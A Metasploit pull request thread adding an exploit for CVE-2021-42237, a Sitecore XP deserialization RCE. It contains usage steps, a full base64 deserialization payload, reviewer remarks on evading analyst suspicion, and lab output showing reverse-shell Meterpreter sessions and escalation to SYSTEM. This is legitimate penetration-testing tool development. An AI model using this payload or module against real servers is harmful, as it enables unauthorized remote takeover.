Add in exploit and documentation for CVE-2021-42237
rapid7/metasploit-framework pull request #15858
Opened 2021-11-10 21:54 UTC by gwillcox-r7

Add in an module for CVE-2021-42237. Based heavily off of the original article from https://blog.assetnote.io/2021/11/02/sitecore-rce/, props to AssetNote for finding the bug!

## Verification

1. Start `msfconsole`
1. Do: `use exploit/windows/http/cve_2021_42237`
1. Set the `RHOSTS` option.
1. Set the `TARGET` option if desired.
1. Set the `VHOST` to the virtual host name of the site, which will by default be `NewInstance1`.
1. Set an appropriate payload for the `PAYLOAD` option.
1. Set any additional options as required by the previously selected payload
1. Run the exploit
1. Verify you get a shell as `NT AUTHORITY\NETWORK SERVICE`
1. Optional: Verify you can get a `SYSTEM` shell by running `getsystem -t 4`

Contact me if you need additional help setting up SiteCore; instructions are in the documentation but a few steps are a little tricky.

2021-11-10 21:59 UTC, jbaines-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +            <source>#{Rex::Text.rand_text_alpha(3..25)}</source>
For what it's worth, not all of these tags are needed. See the payload I wrote here: https://attackerkb.com/topics/g2wzJERRtL/cve-2021-42237/rapid7-analysis?referrer=activityFeed

2021-11-10 22:07 UTC, gwillcox-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +            <source>#{Rex::Text.rand_text_alpha(3..25)}</source>
Good point, let me see if I can't minimize this down to the bare essentials.

2021-11-10 22:09 UTC, jbaines-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +            <source>#{Rex::Text.rand_text_alpha(3..25)}</source>
Just so no one has to track down what I'm talking about. This is the payload I wrote for AKB:

```
<parameters>
    <parameter name="r7">
        <w b:Type="System.Security.Principal.WindowsIdentity" b:Assembly="mscorlib,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089" xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/">
            <System.Security.ClaimsIdentity.actor b:Type="System.String" b:Assembly="0">AAEAAAD/////AQAAAAAAAAAMAgAAABtNaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAACUAzxPYmplY3REYXRhUHJvdmlkZXIgTWV0aG9kTmFtZT0iU3RhcnQiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOmE9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PVN5c3RlbSI+PE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT48YTpQcm9jZXNzPjxhOlByb2Nlc3MuU3RhcnRJbmZvPjxhOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIvYyB3aG9hbWkgJmd0OyBDOlxQcm9ncmFtRGF0YVxsb2wiIEZpbGVOYW1lPSJjbWQiLz48L2E6UHJvY2Vzcy5TdGFydEluZm8+PC9hOlByb2Nlc3M+PC9PYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+PC9PYmplY3REYXRhUHJvdmlkZXI+Cw==</System.Security.ClaimsIdentity.actor>
        </w>
    </parameter>
</parameters>
```

2021-11-10 22:28 UTC, gwillcox-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +            <source>#{Rex::Text.rand_text_alpha(3..25)}</source>
@jbaines-r7 Thanks for the feedback, tried to remove the excess stuff in https://github.com/rapid7/metasploit-framework/pull/15858/commits/9d6f0a0eb275ed061c4abe3d00e0b377523a48ed, not sure if you think I should adjust it to use your format which may be smaller in size.

2021-11-11 01:37 UTC, wvu-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +            <source>#{Rex::Text.rand_text_alpha(3..25)}</source>
Jake lovingly handcrafted that payload. :)

2021-11-11 11:31 UTC, jbaines-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +            <source>#{Rex::Text.rand_text_alpha(3..25)}</source>
I do like that payload inside of `WindowsIdentity` goes over the wire with at least base64 encoding, but I don't think it's a requirement to switch over.

2021-11-11 16:24 UTC, gwillcox-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +            <source>#{Rex::Text.rand_text_alpha(3..25)}</source>
I thought base64 encoding might make things more suspicious. At least that and PowerShell often raises a lot of analysts eyebrows. I'll leave this as is for now, but open to opinions if people want to change.

2021-11-11 19:05 UTC, wvu-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +        'Privileged' => true,
```suggestion
        'Privileged' => false,
```

Service account.

2021-11-11 19:07 UTC, wvu-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +              'CmdStagerFlavor' => :certutil,
Is this a limitation?

2021-11-11 19:08 UTC, gwillcox-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +        'Privileged' => true,
Confused. Technically speaking you can escalate from that account to SYSTEM pretty easily.

2021-11-11 19:09 UTC, gwillcox-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +              'CmdStagerFlavor' => :certutil,
This is likely left over from the module I based this off of. Happy to change this based on recommendations; this isn't a limitation of this exploit.

2021-11-11 19:10 UTC, wvu-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +        'Privileged' => true,
Generally reserved for `SYSTEM` or root.

2021-11-11 19:11 UTC, wvu-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +        'Privileged' => true,
Sure, but your module doesn't perform privilege escalation.

2021-11-11 19:11 UTC, wvu-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +              'CmdStagerFlavor' => :certutil,
It does limit your selection.

2021-11-11 19:13 UTC, gwillcox-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +        'Privileged' => true,
Fair point, I can update this so long, I think the description notes that it is possible to escalate to SYSTEM however as you pointed out it doesn't do this by default as Spencer and others have pointed out this may not be what the user always wants to do which is why I didn't do this for this module.

2021-11-11 19:14 UTC, wvu-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +        'Privileged' => true,
Right, that's best left to a local exploit.

2021-11-11 19:14 UTC, gwillcox-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +              'CmdStagerFlavor' => :certutil,
Sounds good, I'll drop this in the next commit when I also remove the Privileged flag and set it to False.

2021-11-11 19:16 UTC, wvu-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +        'Privileged' => true,
You can stick a comment at the end of that line if it makes you feel better. I have before.

2021-11-11 19:18 UTC, wvu-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +          'WfsDelay' => 30 # It can take a few seconds for reverse shells to trigger. Bind shells should be pretty quick.
Was this the solution to your problem yesterday??

2021-11-11 19:20 UTC, wvu-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +      'redirect_depth' => 0
Does this do anything?

2021-11-11 19:21 UTC, wvu-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +      return
```suggestion
```

2021-11-11 19:23 UTC, wvu-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +            </parameters>|
Maybe pull this out so you're not defining it on every invocation of `execute_command`. Up to you. Would make the method more readable.

2021-11-11 19:25 UTC, wvu-r7 requested changes
Nice and quick. Well done. :)

2021-11-11 19:26 UTC, gwillcox-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +      'redirect_depth' => 0
This is testament to my massive confusion over how redirects work with various methods in Metasploit. Please leave as is :trollface:. 

In all seriousness, this looks like it was left over from when I thought `send_request_cgi` would follow redirects in attempt to get it to not follow redirects.

2021-11-11 19:27 UTC, gwillcox-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +          'WfsDelay' => 30 # It can take a few seconds for reverse shells to trigger. Bind shells should be pretty quick.
Nope, thats still an issue. This is more just to allow a bit of time for connections to occur however it can likely be removed.

2021-11-11 19:28 UTC, gwillcox-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +        'Privileged' => true,
Will probably do that just to avoid any confusion.

2021-11-11 19:29 UTC, wvu-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +          'WfsDelay' => 30 # It can take a few seconds for reverse shells to trigger. Bind shells should be pretty quick.
Fine to leave it if it helps.

2021-11-11 19:30 UTC, wvu-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +      'redirect_depth' => 0
Yeah, I'd remove the dead code. :)

2021-11-11 20:10 UTC, gwillcox-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +      return
Woops looks like I had originally planned this to be slightly different and forgot to clean this up during editing of the code, thanks for spotting this.

2021-11-11 20:11 UTC, gwillcox-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +            </parameters>|
Yeah will do that, I was actually thinking the same thing when looking at this code.

2021-11-11 20:40 UTC, gwillcox-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +            </parameters>|
Fixed with https://github.com/rapid7/metasploit-framework/pull/15858/commits/be4fa90f1aab0ef38ab1ca21cd02754be6940a5c

2021-11-11 20:40 UTC, gwillcox-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +      return
Fixed with https://github.com/rapid7/metasploit-framework/pull/15858/commits/be4fa90f1aab0ef38ab1ca21cd02754be6940a5c

2021-11-11 20:40 UTC, gwillcox-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +      'redirect_depth' => 0
Removed dead code in https://github.com/rapid7/metasploit-framework/pull/15858/commits/be4fa90f1aab0ef38ab1ca21cd02754be6940a5c

2021-11-11 20:41 UTC, gwillcox-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +          'WfsDelay' => 30 # It can take a few seconds for reverse shells to trigger. Bind shells should be pretty quick.
Removed the WfsDelay option in https://github.com/rapid7/metasploit-framework/pull/15858/commits/be4fa90f1aab0ef38ab1ca21cd02754be6940a5c

2021-11-11 20:41 UTC, gwillcox-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +              'CmdStagerFlavor' => :certutil,
Removed the CmdStagerFlavor option being set in https://github.com/rapid7/metasploit-framework/pull/15858/commits/be4fa90f1aab0ef38ab1ca21cd02754be6940a5c

2021-11-11 20:41 UTC, gwillcox-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +        'Privileged' => true,
Added additional comment and changed this to False in https://github.com/rapid7/metasploit-framework/pull/15858/commits/be4fa90f1aab0ef38ab1ca21cd02754be6940a5c

2021-11-11 20:54 UTC, wvu-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +    @xml_payload = %|<parameters>
You can `def` this so it doesn't clutter up `exploit`.

2021-11-11 21:00 UTC, wvu-r7 commented
Can we name this `sitecore_xp_cve_2021_42237` or something so it's easier to find by filename?

2021-11-11 21:54 UTC, gwillcox-r7 commented
> Can we name this `sitecore_xp_cve_2021_42237` or something so it's easier to find by filename?

Yep sounds good, let me fix this up and your other request so long 👍

2021-11-11 22:43 UTC, gwillcox-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +    @xml_payload = %|<parameters>
https://github.com/rapid7/metasploit-framework/pull/15858/commits/8d55b16adefbdbd904f25dddf043786b6996507d fixes this

2021-11-11 22:44 UTC, gwillcox-r7 commented
@wvu-r7 Fixed your two requests with https://github.com/rapid7/metasploit-framework/pull/15858/commits/8d55b16adefbdbd904f25dddf043786b6996507d

2021-11-12 01:56 UTC, wvu-r7 approved these changes

2021-11-12 01:58 UTC, wvu-r7 commented on modules/exploits/windows/http/sitecore_xp_cve_2021_42237.rb
> +    tmp_xml_payload = xml_payload.gsub(/PAYLOAD/, cmd.encode(xml: :text))
I don't want to nitpick this further, but `xml_payload` _could_ take an argument instead.

2021-11-12 02:01 UTC, wvu-r7 commented on modules/exploits/windows/http/sitecore_xp_cve_2021_42237.rb
> +    tmp_xml_payload = xml_payload.gsub(/PAYLOAD/, cmd.encode(xml: :text))
`xml_payload(cmd)`, where `cmd` is encoded within the method.

2021-11-12 02:02 UTC, wvu-r7 commented on modules/exploits/windows/http/sitecore_xp_cve_2021_42237.rb
> +    tmp_xml_payload = xml_payload.gsub(/PAYLOAD/, cmd.encode(xml: :text))
That would also obviate the need for `tmp_xml_payload`.

2021-11-12 03:48 UTC, wvu-r7 commented on modules/exploits/windows/http/cve_2021_42237.rb
> +            <source>#{Rex::Text.rand_text_alpha(3..25)}</source>
but i thought base64 was encryption

2021-11-12 05:48 UTC, gwillcox-r7 commented on modules/exploits/windows/http/sitecore_xp_cve_2021_42237.rb
> +    tmp_xml_payload = xml_payload.gsub(/PAYLOAD/, cmd.encode(xml: :text))
We must program harder, better, faster, stronger 😄 Will fix this cause lets be honest my way of doing this wasn't really the right way.

2021-11-12 05:52 UTC, wvu-r7 commented on modules/exploits/windows/http/sitecore_xp_cve_2021_42237.rb
> +    tmp_xml_payload = xml_payload.gsub(/PAYLOAD/, cmd.encode(xml: :text))
There are many ways. I'm striving for readability/maintainability. :)

2021-11-12 05:57 UTC, gwillcox-r7 commented on modules/exploits/windows/http/sitecore_xp_cve_2021_42237.rb
> +    tmp_xml_payload = xml_payload.gsub(/PAYLOAD/, cmd.encode(xml: :text))
Fixed in https://github.com/rapid7/metasploit-framework/pull/15858/commits/7e01e33e513921ca78ff326f2d8555a53d5be817, let me know if you find anything else similar.

2021-11-12 05:58 UTC, wvu-r7 approved these changes

2021-11-12 05:58 UTC, wvu-r7 commented on modules/exploits/windows/http/sitecore_xp_cve_2021_42237.rb
> +    tmp_xml_payload = xml_payload.gsub(/PAYLOAD/, cmd.encode(xml: :text))
Nope, looks great!

2021-11-15 19:24 UTC, smcintyre-r7 approved these changes
Tested all three targets successfully, everything is working correctly. I'll have this landed shortly.

<details>
<summary>Testing Output</summary>

```
msf6 exploit(windows/http/sitecore_xp_cve_2021_42237) > 
msf6 exploit(windows/http/sitecore_xp_cve_2021_42237) > show options 

Module options (exploit/windows/http/sitecore_xp_cve_2021_42237):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.45   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path of Sitecore
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST      NewInstance1     no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows Dropper


msf6 exploit(windows/http/sitecore_xp_cve_2021_42237) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Response.ashx is accessible and appears to be deserializing data!
[*] Command Stager progress -  17.01% done (2046/12025 bytes)
[*] Command Stager progress -  34.03% done (4092/12025 bytes)
[*] Command Stager progress -  51.04% done (6138/12025 bytes)
[*] Command Stager progress -  68.06% done (8184/12025 bytes)
[*] Command Stager progress -  84.24% done (10130/12025 bytes)
[*] Sending stage (200262 bytes) to 192.168.159.45
[*] Command Stager progress - 100.00% done (12025/12025 bytes)
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.45:49703 ) at 2021-11-15 14:11:18 -0500

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > sysinfo
Computer        : WIN-BPID95ACQ7E
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > privs
[-] Unknown command: privs
meterpreter > getprivs 

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege

meterpreter > getsystem
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.45 - Meterpreter session 3 closed.  Reason: User exit
msf6 exploit(windows/http/sitecore_xp_cve_2021_42237) > 
msf6 exploit(windows/http/sitecore_xp_cve_2021_42237) > show options 

Module options (exploit/windows/http/sitecore_xp_cve_2021_42237):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.45   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path of Sitecore
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST      NewInstance1     no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows Dropper


msf6 exploit(windows/http/sitecore_xp_cve_2021_42237) > set TARGET 2
TARGET => 2
msf6 exploit(windows/http/sitecore_xp_cve_2021_42237) > show options 

Module options (exploit/windows/http/sitecore_xp_cve_2021_42237):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.45   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path of Sitecore
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST      NewInstance1     no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   PowerShell Stager


msf6 exploit(windows/http/sitecore_xp_cve_2021_42237) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Response.ashx is accessible and appears to be deserializing data!
[*] Sending stage (200262 bytes) to 192.168.159.45
[*] Meterpreter session 4 opened (192.168.159.128:4444 -> 192.168.159.45:49706 ) at 2021-11-15 14:17:42 -0500

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > sysinfo
Computer        : WIN-BPID95ACQ7E
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getsystem
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > background 
[*] Backgrounding session 4...
 [...]

2021-11-15 19:28 UTC, merged

2021-11-15 19:29 UTC, smcintyre-r7 commented
# Release Notes

This adds an exploit for CVE-2021-42237 which is an unauthenticated RCE within the Sitecore Experience Platform. The vulnerability is due to the deserialization of untrusted data submitted by the attacker.